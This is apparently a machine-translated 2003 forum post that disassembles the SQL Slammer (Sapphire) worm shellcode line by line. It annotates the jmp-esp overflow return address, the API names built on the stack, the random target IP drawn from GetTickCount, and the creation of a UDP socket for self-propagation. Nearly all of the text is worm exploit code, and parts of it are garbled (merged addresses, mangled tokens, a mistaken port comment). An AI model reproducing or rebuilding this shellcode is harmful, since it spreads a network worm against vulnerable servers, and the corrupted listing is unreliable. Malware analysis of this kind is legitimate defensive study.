Suddenly, it is very interested in the code of SQL WORM SAPPHIRE, for the Test Code given online,
I always read 4 o'clock in the morning, I finally took the key code, and I analyzed the virus for the first time.
Very good, this virus is too superb. If there is any mistake, please take an ax. YANGRUNHUA 2/9/03 04:30 AM Note: The specific address has a difference in different versions of machines.
0012FCED push 42b0c9dch; at 42B0C9DC is loaded at the rear sqlsort.dll FFE4 i.e. jmp esp, as a return address 0012FCF2 B801010101 mov eax, 1010101h0012FCF7 31C9 xor ecx, ecx0012FCF9 B118 mov cl, 18h0012FCFB 50 push eax0012FCFC E2FD loop 0012FCFB; filling cycle 01010101h0012FCFE 3501010105 xor eax , 5010101H; EAX = 04000000H0012FD03 50 Push EAX; buffer EBP 04H from the program head to this to be overflow ;; / x04/x01/0x01...../0x01/0x01/0xdc/0xc9/ 0xB0 / 0x420012FD04 89E5 mov ebp, esp; save esp to ebp0012FD06 51 push ecx 0012FD07 682E646C6C push 6C6C642Eh0012FD0C 68656C3332 push 32336C65h0012FD11 686B65726E push 6E72656Bh; .string "kernel32.dll" ebp-10h0012FD16 6847657454 push 54746547h 51 push ecx0012FD17 686F756E74 push 746E756Fh0012FD1C 6869636B43 push 436B6369h0012FD21; .String "gettickcount" EBP-20H0012FD26 66B96C6C MOV CX, 6C6CH 0012FD2A 51 PUSH ECX 0012FD2B 6833322E64 PUSH 642E3233325FD30 687773325F PUSH 5F327377H; .ster g "ws2_32.dll" ebp-2ch0012FD35 66B96574 mov cx, 7465h0012FD39 51 push ecx0012FD3A 68736F636B push 6B636F73h; .string "socket" ebp-34h0012FD3F 66B9746F mov cx, 6F74h0012FD43 51 push ecx0012FD44 6873656E64 push 646E6573h; .string "sendto" ebp-3ch0012FD49 BE1810AE42 mov esi, 42AE1018h; address of GetDllHandle0012FD4E 8D45D4 lea eax, [ebp-2Ch] 0012FD51 50 push eax; address of "ws2_32.dll" ebp-40h0012FD52 FF16 call dword ptr [esi]; call GetDllHandle0012FD54 50 push eax; HINSTANCE of ws2_32. DLL EBP-40H0012FD55 8D45E0 LEA EAX, [EBP-20H] 0012FD58 50 PUSH EAX;
address of "GetTickCount" ebp-44h0012FD59 8D45F0 lea eax, [ebp-10h] 0012FD5C 50 push eax; address of "kernel32.dll" ebp-48h0012FD5D FF16 call dword ptr [esi]; call GetDllHandle0012FD5F 50 push eax; address of kernel32. dll ebp-48h0012FD60 BE1010AE42 mov esi, 42AE1010h0012FD65 8B1E mov ebx, dword ptr [esi] 0012FD67 8B03 mov eax, dword ptr [ebx] 0012FD69 3D558BEC51 cmp eax, 51EC8B55h0012FD6E 7405 je 0012FD750012FD70 BE1C10AE42 mov esi, 42AE101Ch0012FD75 FF16 call dword ptr [esi]; call GetProcAddress for address of GetTickCount0012FD77 FFD0 call eax; call GetTickCount0012FD79 31C9 xor ecx, ecx0012FD7B 51 push ecx 0012FD7C 51 push ecx; must be 0 of last 8 bytes of sockaddr_in struct ebp-48h0012FD7D 50 push eax; Random Value (for dest IP) ebp -4ch0012fd7e 81f10301049a xor ECX, 9A040103H0012FD84 81F101010101 XOR ECX, 1010101H0012FD8A 51 push ecx; ecx 0x9b050002 AF_INET 0x0002 port 1435 htons (1435) = 0x9b05 ebp-50h0012FD8B 8D45CC lea eax =, [ebp-34h] 0012FD8E 50 push eax; address of "socket" ebp-54h0012FD8F 8B45C0 mov eax, dword ptr [ebp -40h] 0012FD92 50 push eax; address of ws2_32.dll ebp-58h0012FD93 FF16 call dword ptr [esi]; call GetProcAddress for address of socket0012FD95 6A11 push 11h; UDP protocol ebp-54h0012FD97 6A02 push 2; SOCK_DGRAM ebp-58h0012FD99 6A02 push 2 ; AF_INET EBP-5CH0012FD9B FFD0 Call EAX; Call Socket0012FD9D 50 Push Eax;